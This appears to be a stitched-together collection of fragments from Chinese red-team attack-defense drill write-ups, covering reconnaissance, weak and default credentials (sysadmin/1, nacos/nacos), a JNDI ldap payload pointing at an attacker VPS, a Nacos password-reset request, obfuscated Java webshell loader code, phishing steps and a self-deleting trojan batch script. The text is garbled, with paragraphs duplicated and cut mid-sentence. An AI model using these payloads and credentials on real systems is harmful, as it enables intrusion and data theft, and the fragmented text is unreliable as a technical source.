攻防演练简介 国家级攻防演练从2016年开始,已经走过了6个年头,它是由公安部组织的,这个网络安全攻防演练集结了国家顶级的攻防力量,以不限制手段、路径,进行获取权限并攻陷指定靶机为目的实战攻防演练。 攻防演练主要目标涵盖国家重要行业的关键信息基础设施、每年覆盖行业、单位、系统都在逐渐扩大。 这个攻防演练时间一般持续2到3周。一般护网演练都是在白天工作日进行,不过攻击方是不分时间点在尝试攻击。 (上图出自公安部第一研究所的分享会) 攻防演练中高频的漏洞: 1、web漏洞为主:SQL注入、XSS(跨站脚本攻击)、文件上传漏洞等等 2、以获取系统权限漏洞为主 2.1、代码执行漏洞 、攻防演练实战赋能 临战阶段:实战化流程制定、全员攻防演练宣导、全员社工防范测试、安全演练模拟与总结、风险持续评估优化 实战阶段:安全专家值守、实战演练能力(包括:情报整合能力、安全监测能力、安全分析能力 小结 攻防演练过程中最关注的是权限和数据这两个点,基于对这两个点进行攻防。
信息安全的关键因素是人,有人的地方就有江湖,江湖中避免不了攻防博弈,而博弈是攻防双方采用越来越新的技术进行较量的过程。对于国家、企事业单位甚至个人而言,守护安全防线,确保数据不遗失是最终目的。 攻防演练活动中“以攻促防”、“以攻验防”的思维正是运用了这种思想,并希望通过这种形式找到安全防线缺失的地方,巩固安全边界,让攻击者无处遁形,所有的“阴谋论”无计可施。 而且,攻防演练活动自兴起以来,越来越常态化。但是,每年的这个时刻,都是攻防双方激烈博弈、尤为紧张的时刻。 ,可谓是神经紧绷、夜晚失眠、饭菜不香,真希望攻防演练的活动抓紧结束,避免自身丢分,被吊打的很惨。 而且,RASP技术集合BAS技术可以在攻防演练活动中实现自动化检测,对安全威胁进行验证,确保安全链路完整。正因此,RASP技术可以更好的在攻防演练中发挥作用,确保防线安全,避免防守方丢分。
时间 时间在22年护网结束之后,8月中旬左右,当时公司接了一个市级的攻防演练,作为实习生的我,有幸和师傅一起参加,也是我第一次以红队身份参加,当然,更多的还是蹭师傅的光 拿了第一有个感谢信(O(∩_∩ 端口开放: 成果五:某公司MongoDB未授权漏洞(空口令) 这个比较容易,fofa搜了下发现27017端口,遂尝试 成果六:某公司OA注入+任意文件上传 首先是某OA的注入获取shell 攻防开始前已经被上传马了 结尾 我也是第一次参加,虽然每边分到90多个url,但是一半多都是门户网站,一开始说内网可以打,过了一天又不让打了,当时因为cs的版本上线还有点问题纠结好久,然后星期五开始写报告就结束了这次攻防演练
文章首发于:奇安信攻防社区 https://forum.butian.net/share/1633 背景 记一次EDU攻防,来之前还是有点怂的,因为前段时间刚打了其它地方EDU感受了一波,小部分目标有重合好难打啊 第二天找c师傅看了一下也搞不上敲了这下咋办啊,设备有telnet、ping功能,看了下设备上路由表确定了有2、3、5、6网段,telnet测试了一波网段一头一尾的IP,根据端口开放情况确定了2网段都是些服务器 那现在我们只有笨方法了,试试运气去探测内网的脆弱端口如22、1433、3389、6379、7001,说干就干,之前在信息收集的时候确定了靶标IP段在2段,那么我们直接按照靶标的IP前后去探测上面的脆弱端口 网络设备分数上限2k,之前无线ap已经把分数打满了,交了也是白交,继续看靶标系统和虚拟化平台,没有一个能可以打的,刚才的设备万能密码也没用。 总结 这次攻防整体的反思,外网打点信息收集尽量宽泛仔细一些,在现场打压力还是大的打不出来东西就是在坐牢,和队伍里师傅第一次协作不是很好没有沟通好打哪个目标好点,师傅第一次打也很懵逼,我打的多之前都是旁边辅助混子哈哈哈
前 言 据说今年的攻防演练马上又要开始了,很多企业都开始了前期的准备工作。资产的梳理,暴露面收敛是前期必须做且要做好的工作。 其实在攻防领域也是这样,一个企业安全的好坏不在于某一方面你做的有多好,而在于那些方面还没有做好。只要你在某些方面还存在短板,那么就可能会被攻破。 事后总结了一下可能得原因: 1)域名的DNS解析下了,服务器上的文件没有下线,导致可以直接通过IP去访问 2)绕过了正常的发布流程,直接去发布应用 3)项目组在云上了搭建了项目,挂的是公司的域名 排查时一定要注意下面的几点 近源渗透作为可落地的新型攻击形式,在近年的攻防演练中被多次利用。近源渗透是指攻击者物理入侵目标区域,利用无线网络、物理接口、智能终端等进行渗透。近源渗透犹如“堤溃蚁孔”一般,值得我们重点关注。 因此我们要在办公网区域重点排查: 无线网络(wifi) 1.无线节点是否存在弱密码,私接私搭无线节点 2.wifi是否做了访问控制,wifi网络是否可以直达核心网络。
2.护网演练 在准备阶段,演练过程中,红队采取脚本构造恶意payload,来测试安全设备的告警及安全监控分析人员的响应能力。 python2脚本如下,代码中的字典就不放出了,可自行构造: # -*- encoding: utf-8 -*- import requests import datetime import time /></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>''' data2 脚本木马 代码执行 恶意攻击 误报 Web插件漏洞攻击 代码执行 Web插件漏洞攻击 Struts2漏洞攻击 应用漏洞攻击 struts2漏洞攻击 代码执行 代码执行 文件非法上传 误报 SQL注入 2.攻击软件的特征 众所周知,攻击方用的工具,防守方也有,所以大多数监控设备都会提取攻击方的特征值,去匹配恶意攻击流量,来实施拦截防护。 如菜刀,CS,MSF,基本都被秒杀。
现在我依稀记得大家在9月25日晚集体过年的场景,没想到的是:那tm只是开始 这一段时间一直在打攻防,重复、单调、无长进,希望早日脱离苦海吧 下面以攻防过程中的一段经历来展现一些有意思的tips ---- 等协议的发现 给定的全部端口 Nmap 辅助 -sV -O --script=banner,vuln,exploit,brute 0x03 摸点 网络设备、安全设备的默认口令 Weblogic、Struts2 删除自解压程序 del /f /a /q %b% rem 删除马 del /f /a /q %0% rem 删除bat自身 0x05 内网渗透 我对于攻防比赛中的内网渗透是及其反感的
文章首发于:奇安信攻防社区 https://forum.butian.net/share/1780 对前阵子的攻防演练比赛进行总结,分享一些个人的思路和方法 0x01 外网打点 资产发现 多测绘平台搜索 #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里 123 test root 对于一些应用广泛的系统,可以通过google语法搜索其默认密码 这里通过sysadmin/1 成功登入泛微后台 nacos/nacos 常见漏洞利用 对于多目标的攻防演练 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p" d2hvYW1p为命令的base64,这里是执行命令whoami 0x02 内网渗透 杀软识别 域内主机 DNS 一般就是域控地址 接着可以通过该机器是否开放53和389端口进行进一步确认 这次攻防演练的其中一个目标,通过密码复用爆破成功的某台机器里,刚好存在着域管进程,提权到system权限后注入到域管进程
各位小伙伴们, 安全界一年一度的激动人心的攻防演练盛况即将来临:) 这里给大家准备些弹药, 主要是近些年的可以进后台/getshell的漏洞, 漏洞太多难免疏漏. 漏洞简介 Apache Shiro 是企业常见的Java安全框架, 其漏洞在2019年攻防演练中起到显著作用 2. Shiro 100 Key https://mp.weixin.qq.com/s/sclSe2hWfhv8RZvQCuI8LA 2.使用 URLDNS 进行检测提速 使用适应性最强的URLDNS(这个不受 防护方法 1.升级1.5.2版本及以上 2.尽量避免使用*通配符作为动态路由拦截器的URL路径表达式. Fastjson 反序列化远程代码执行漏洞 1. 漏洞简介 Xstream Java 中经常用于处理 xml 的库, 最近一次修复中(1.4.10版本)重现了历史反序列化远程代码执行漏洞, 所以也需要关注 2.
在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。 但安全防护注重全面性,具有明显的短板... 1、供应链 在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。 orgLevel去除,再发包,即可越权看到全员组织架构 点击修改密码,然后将上述获取到的roleId添加进去,即可获取全部权限 获取到大量数据 1.4、公众号 js泄露密码,密码可撞库目标单位公众号 2、 访问/v2/_catalog接口即可查看全部仓库内容 https://github.com/Soufaker/docker_v2_catalog 利用上述工具可直接下载镜像 2.3.2、 Docker accessToken\=' -H 'User-Agent:Nacos-Server' -d 'username\=test1&newPassword\=test2' 弱口令:nacos/nacos
https://github.com/EdgeSecurityTeam/EHole Ehole.exe -fofa 检测的域名 寻找口子 1、每个网站可以尝试默认密码或’admin’、1qazxsw2= ===等类似弱口令 这里通过sysadmin/1 成功登入泛微后台 2、接着浏览其他站点,这里运气比较好发现了用友的nday 3、访问接口/servlet/~ic/bsh.servlet.BshServlet vpx_host;" > password.enc #改成这种格式 *H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg == *zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q== *Q81OIBXziWr0orka0j /jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw== *R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA
在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。 但安全防护注重全面性,具有明显的短板... 1、供应链 在经历了多年的攻防对抗之后,大量目标单位逐渐认识到安全防护的重要性。因此,他们已采取措施尽可能收敛资产暴露面,并加倍部署各种安全设备。 orgLevel去除,再发包,即可越权看到全员组织架构 点击修改密码,然后将上述获取到的roleId添加进去,即可获取全部权限 获取到大量数据 1.4、公众号 js泄露密码,密码可撞库目标单位公众号 2、 访问/v2/_catalog接口即可查看全部仓库内容 https://github.com/Soufaker/docker_v2_catalog 利用上述工具可直接下载镜像 2.3.2、 Docker accessToken\=' -H 'User-Agent:Nacos-Server' -d 'username\=test1&newPassword\=test2' 弱口令:nacos/nacos 通过编排密码爆破进后台
从今年的五月份正式接触渗透实战到现在我依旧觉得攻防的本质仍是信息收集并且自身的知识面决定了攻击面。 xxx.xxx.xxx.xxx;我们针对该ip进行信息收集;通过网络空间安全测绘平台(鹰图平台、360网络空间测绘、FOFA)进行信息收集;此时发现其7777端口开放服务且搭建了一个致远OA系统 OA系统在攻防演练中都是兵家必争之地 B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2% %C2%93%C3%8BH\*va%C3%B9%0F%C3%A0\_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3% ;相比与之前的手足无措,这次也略微从容了点;在没有域环境的内网下也是略容易上手一点 不足之处 一直在192.168这个段中一直转圈圈无法实现虚拟机逃逸 没有想到是否能通10或者172.16段也导致这个攻防分数可能没有全部拿满
从今年的五月份正式接触渗透实战到现在我依旧觉得攻防的本质仍是信息收集并且自身的知识面决定了攻击面。若该篇文章存在错误恳请各位师傅们斧正;若您对该渗透流程有更好的建议或者不同的思路想法也烦请您不吝赐教。 xxx.xxx.xxx.xxx;我们针对该ip进行信息收集;通过网络空间安全测绘平台(鹰图平台、360网络空间测绘、FOFA)进行信息收集;此时发现其7777端口开放服务且搭建了一个致远OA系统OA系统在攻防演练中都是兵家必争之地 B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2% %C2%93%C3%8BH\*va%C3%B9%0F%C3%A0\_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3% 用户信息泄露总结和反思这也算是自己第三次打内网了;相比与之前的手足无措,这次也略微从容了点;在没有域环境的内网下也是略容易上手一点不足之处一直在192.168这个段中一直转圈圈无法实现虚拟机逃逸没有想到是否能通10或者172.16段也导致这个攻防分数可能没有全部拿满
在壹篇中主要讲了弱口令漏洞在攻防演练中的利用,有朋友可能会觉得弱口令漏洞非常简单,为什么还要讲它呢? 理由是虽然弱口令漏洞非常简单,但是在攻防演练环境下还是普遍存在的,因此针对未知系统我会优先尝试弱口令。 本文主要介绍我在攻防演练中遇到的两个实战思路,分别是逻辑漏洞和SQL注入的利用。 0x01 逻辑漏洞 在资产收集时 fofa 是一个非常不错的工具,比如针对哥谭市的攻防演练,在实在找不到其他资产的情况下,可以使用title="哥谭"搜索全部与哥谭市相关的网络资产,导出后再筛选即可发现一些与目标相关联的系统 只有实践才是检验真理的唯一标准,攻防演练就是一个非常不错的平台,欢迎各位大佬交流相关的心得体会。
lavarel框架配置不当导致敏感数据泄露-->云上攻防 lavarel框架敏感数据泄露 在laravel框架的.env配置文件中,默认调试功能debug是开启的。当使程序报错时。 云上攻防 AK、SK泄露: 拿到泄露的AK和SK后开启第一次的云上攻防体验 行云管家: 注意:到这里其实已经可以交差了,渗透测试中千万不要重置密码!!!
GB2312systemctl restart httpd修改完成后最终结果:搜集第一批邮箱进行投递,投递完成后等着鱼儿上钩等鱼儿上钩后,登录oa或邮箱系统获取更多员工的邮箱进行二次钓鱼,或者可以利用内网邮箱直接投递这次演练里由于发送邮件数量较多 /*Z5Z48C2BT7*/getDeclaredMethod/*Z5Z48C2BT7*/("doFinal", new Class[]{byte[].class}).invoke(BI3fM5,new /*Z5Z48C2BT7*/lang. /*Z5Z48C2BT7*/reflect.Method A14I0 = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Z5Z48C2BT7 /*Z5Z48C2BT7*/getContextClassLoader(), I934d9i , 0, I934d9i.length); Object Q362 = i.
网络攻防演练的价值分析 举行网络攻防演练具有积极意义,攻防队伍实施“背靠背”的演练,通过攻防对抗,考验防守方的安全防护能力以及对安全事件的监测发现能力和应急处置能力。 国内外开展的网络攻防演练均涉及政府机构、企事业等多家单位,通过安全演练强化政企、军民之间的联动防御能力。 2、培养和提升网络安全人才实战能力 2011 年,美国土安全部和人力资源办公室共同提出《网络安全人才队伍框架(草案)》。 2、第二战场 作战力量:防守方(甲方)中的各单位作战能力较量 关键词:合规考核 第二战场,顾名思义是甲方横向单位之间防守能力较量的战场。 行业性攻防演练相比非行业性攻防演练主要有两点不同,一是业务系统相似甚至相同,横向外部情报的可用性更高(因此防守方之间的合作很有用);二是攻击方的技术支持人员多为安全建设项目中的乙方,获取外部情报相对容易
文章由作者授权转载,首发于奇安信攻防社区 https://forum.butian.net/share/1955 从钓鱼上线到内网漫游 钓鱼 邮箱搜集 在线平台搜集,推荐两个好用的平台 https:// restart httpd 修改完成后最终结果: 搜集第一批邮箱进行投递,投递完成后等着鱼儿上钩 等鱼儿上钩后,登录 oa 或邮箱系统获取更多员工的邮箱进行二次钓鱼,或者可以利用内网邮箱直接投递 这次演练里由于发送邮件数量较多 /*Z5Z48C2BT7*/getDeclaredMethod/*Z5Z48C2BT7*/("doFinal", new Class[]{byte[].class}).invoke(BI3fM5,new /*Z5Z48C2BT7*/lang. /*Z5Z48C2BT7*/reflect.Method A14I0 = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Z5Z48C2BT7
restart httpd 修改完成后最终结果: 搜集第一批邮箱进行投递,投递完成后等着鱼儿上钩 等鱼儿上钩后,登录oa或邮箱系统获取更多员工的邮箱进行二次钓鱼,或者可以利用内网邮箱直接投递 这次演练里由于发送邮件数量较多 /*Z5Z48C2BT7*/getDeclaredMethod/*Z5Z48C2BT7*/("doFinal", new Class[]{byte[].class}).invoke(BI3fM5,new /*Z5Z48C2BT7*/lang. /*Z5Z48C2BT7*/reflect.Method A14I0 = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Z5Z48C2BT7 /*Z5Z48C2BT7*/getContextClassLoader(), I934d9i , 0, I934d9i.length); Object Q362 = i.